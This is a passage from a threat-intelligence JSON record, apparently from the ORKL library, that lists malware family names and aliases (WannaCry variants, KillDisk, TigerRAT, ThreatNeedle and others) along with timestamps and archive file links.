				"SierraJuliett-MikeOne",
				"SierraJuliett-MikeTwo",
				"SimpleTea",
				"SimplexTea",
				"SmallTiger",
				"Stunnel",
				"TAINTEDSCRIBE",
				"TAXHAUL",
				"TFlower",
				"TOUCHKEY",
				"TOUCHMOVE",
				"TOUCHSHIFT",
				"TOUCHSHOT",
				"TWOPENCE",
				"TYPEFRAME",
				"Tdrop",
				"Tdrop2",
				"ThreatNeedle",
				"Tiger RAT",
				"TigerRAT",
				"Trojan Manuscript",
				"Troy",
				"TroyRAT",
				"VEILEDSIGNAL",
				"VHD",
				"VHD Ransomware",
				"VIVACIOUSGIFT",
				"VSingle",
				"ValeforBeta",
				"Volgmer",
				"Vyveva",
				"W1_RAT",
				"Wana Decrypt0r",
				"WanaCry",
				"WanaCrypt",
				"WanaCrypt0r",
				"WannaCry",
				"WannaCrypt",
				"WannaCryptor",
				"WbBot",
				"Wcry",
				"Win32/KillDisk.NBB",
				"Win32/KillDisk.NBC",
				"Win32/KillDisk.NBD",
				"Win32/KillDisk.NBH",
				"Win32/KillDisk.NBI",
				"WinorDLL64",
				"Winsec",
				"WolfRAT",
				"Wormhole",
				"YamaBot",
				"Yort",
				"ZetaNile",
				"concealment_troy",
				"http_troy",
				"httpdr0pper",
				"httpdropper",
				"klovbot",
				"sRDI"
			],
			"source_id": "ETDA",
			"reports": null
		}
	],
	"ts_created_at": 1775434494,
	"ts_updated_at": 1775792299,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/f35c94bced01b50ed62c883f0a09ff211a24fa02.pdf",
		"text": "https://archive.orkl.eu/f35c94bced01b50ed62c883f0a09ff211a24fa02.txt",
		"img": "https://archive.orkl.eu/f35c94bced01b50ed62c883f0a09ff211a24fa02.jpg"
	}
}